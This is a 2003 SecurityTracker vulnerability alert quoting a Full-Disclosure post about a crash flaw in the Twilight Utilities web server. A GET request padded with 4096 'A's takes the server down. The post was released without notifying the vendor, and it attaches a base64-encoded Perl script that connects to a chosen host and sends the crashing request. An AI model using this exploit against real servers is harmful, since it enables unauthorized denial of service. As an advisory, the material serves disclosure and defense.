Twilight Utilities Web Server Can Be Crashed By Remote Users
|
|
SecurityTracker Alert ID: 1006582
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Apr 16 2003
|
Impact: Denial of service via network
|
Exploit Included: Yes
|
Description: A vulnerability was reported in the Twilight Utilities Web Server. A remote user can cause the web server to crash.
Security-Protocols Research Labs reported that a remote user can send a specially crafted HTTP GET request to cause the web service
to crash. According to the report, a GET / followed with 4096 characters can trigger the flaw.
A demonstration exploit script
is provided in the Source Message
|
Impact: A remote user can cause the web service to crash.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.twilightutilities.com/WebServer.html (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (Any)
|
Reported By: "badpack3t" <badpack3t@security-protocols.com>
|
Message History:
This archive entry has one or more follow-up message(s) listed below.
|
Source Message Contents
|
Date: Tue, 15 Apr 2003 21:20:37 -0400 (EDT)
From: "badpack3t" <badpack3t@security-protocols.com>
Subject: [Full-Disclosure] Twilight Utilities TW-WebServer/1, 3, 2, 0 DoS
|
------=_20030415212037_35543
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
SP Research Labs Advisory x02
-----------------------------
www.security-protocols.com
Product - Twilight Utilities TW-WebServer/1,3,2,0
Download it here:
http://www.twilightutilities.com/WebServer.html
Date Released - 04/15/2003
Release Mode - 0hday, why contact the vendor?
Advisory Link:
http://www.security-protocols.com/article.php?sid=1474&mode=thread&order=0
----------------------------
Product Description from the vendor -
We are excited to present this completely new Modem Ready Internet Web
Server supporting these terrific features.
-Installs in seconds
-Lets you INSTANTLY share pictures and files
-Modem aware
-Automates telling friends and family when you start serving
-Automatically integrates your web camera
-Allows others to send files to you
-Automatically generates web pages
-Supports file resume
-A truely unique files-sharing tool
-----------------------------
Vulnerability Description -
To exploit this vulnerability, simply do a GET / with 4096 A's or more
will cause the webserver to go down. Who really gives a damn right?
Tested on:
Windows XP Pro SP1
Windows 2000 SP3
-----------------------------
Credit –
2PAC and Snoop Dogg did most of the work on this one.
-----------------------------
peace out,
badpack3t
www.security-protocols.com
------=_20030415212037_35543
Content-Type: application/x-perl; name="sp-urfuqed.pl"
Content-Disposition: attachment; filename="sp-urfuqed.pl"
Content-Transfer-Encoding: base64
IyEvdXNyL2Jpbi9wZXJsDQojDQojIFR3aWxpZ2h0IFV0aWxpdGllcyBUVy1XZWJTZXJ2ZXIvMSwz
LDIsMCANCiMNCiMgVnVsbmVyYWJsZSBzeXN0ZW1zOg0KIyBUVy1XZWJTZXJ2ZXIvMSwgMywgMiwg
MA0KIyANCiMgV3JpdHRlbiBieSBiYWRwYWNrM3QgPGJhZHBhY2szdEBzZWN1cml0eS1wcm90b2Nv
bHMuY29tPg0KIyBGb3IgU1AgUmVzZWFyY2ggTGFicw0KIyAwNC8xNS8yMDAzDQojIA0KIyB3d3cu
c2VjdXJpdHktcHJvdG9jb2xzLmNvbQ0KIyANCiMgdXNhZ2U6IA0KIyBwZXJsIHNwLXVyZnVxZWQu
cGwgPHRhcmdldD4gPHBvcnQ+DQojDQojIGJpZyB1cHMgMjogYWNpZGphenosICNoYXZvYywgcmVn
dWxhdGUsIGNyMHduLCBtcCwgbG9wdCwgDQojIGFpdGVrNSwgcmFiLCAjZGFya25ldCwgZHZkbWFu
LCBiaW5kLCBhbmQgd2hvZXZlciB0aGUgZiBlbHNlLg0KDQp1c2UgSU86OlNvY2tldDsNCnVzZSBz
dHJpY3Q7DQoNCnByaW50ICIuOi4ieCAyMDsgcHJpbnQgIlxuVFctV2ViU2VydmVyLzEsIDMsIDIs
IDAgRG9TLCA8YmFkcGFjazN0XEBzZWN1cml0eS1wcm90b2NvbHMuY29tPlxuIjsNCnByaW50ICIu
Oi4ieCAyMDsgcHJpbnQgIlxuXG4iOw0KDQppZighZGVmaW5lZCgkQVJHVlswXSAmJiAkQVJHVlsx
XSkpDQp7DQogICAmdXNhZ2U7DQp9DQoNCm15ICRob3N0ICAgICA9ICRBUkdWWzBdOw0KbXkgJGRl
ZiAgICAgID0gIkEiOw0KbXkgJG51bQkgICAgID0gIjQwOTYiOw0KbXkgJHBvcnQgICAgID0gJEFS
R1ZbMV07DQpteSAkdXJmdXFlZCAgPSAkZGVmIHggJG51bTsNCg0KbXkgJHRjcHZhbCAgID0gZ2V0
cHJvdG9ieW5hbWUoJ3RjcCcpOw0KbXkgJHNlcnZlcklQID0gaW5ldF9hdG9uKCRob3N0KTsNCm15
ICRzZXJ2ZXJBZGRyID0gc29ja2FkZHJfaW4oJEFSR1ZbMV0sICRzZXJ2ZXJJUCk7DQpteSAkcHJv
dG9jb2xfbmFtZSA9ICJ0Y3AiOw0KDQpteSAkaWFkZHIgICAgPSBpbmV0X2F0b24oJGhvc3QpIAkg
ICB8fCBkaWUgKCJob3N0IHdhcyBub3QgZm91bmQ6ICRob3N0Iik7DQpteSAkcGFkZHIgICAgPSBz
b2NrYWRkcl9pbigkcG9ydCwgJGlhZGRyKSAgfHwgZGllICgieW91IGRpZCBzb21ldGhpbmcgd3Jv
bmcgc3R1cGlkLi4uIGV4aXRpbmcuLi4iKTsNCm15ICRwcm90byAgICA9IGdldHByb3RvYnluYW1l
KCd0Y3AnKSAgICAgICB8fCBkaWUgKCJjYW5ub3QgZ2V0IHByb3RvY29sIik7DQpzb2NrZXQoU09D
SywgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgic29ja2V0IGNvdWxkIG5v
dCBvcGVuOiAkaG9zdCIpOw0KY29ubmVjdChTT0NLLCAkcGFkZHIpIAkJCSAgIHx8IGRpZSAoImNh
bm5vdCBjb25uZWN0IHRvOiAkaG9zdCIpOw0KDQpteSAkc3VibWl0ICAgPSAiR0VUICR1cmZ1cWVk
IEhUVFAvMS4wXHJcblxyXG4iOyAgIA0Kc2VuZChTT0NLLCRzdWJtaXQsMCk7DQpjbG9zZShTT0NL
KTsNCg0Kc3ViIHVzYWdlIHtkaWUoIlxuXG5Vc2FnZTogcGVybCAkMCA8dGFyZ2V0X2hvc3Q+IDxw
b3J0PlxuXG4iKTt9DQoNCnByaW50ICJcbi46LjouOi46LjouOi46LjouOi46LjouIjsNCnByaW50
ICJcbmNyYXNoIHdhcyBzdWNjZXNzZnVsIH4hXG4iOw0KcHJpbnQgIlwuOi46LjouOi46LjouOi46
LjouOi46LlxuIjsNCg==
------=_20030415212037_35543--
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
|
|
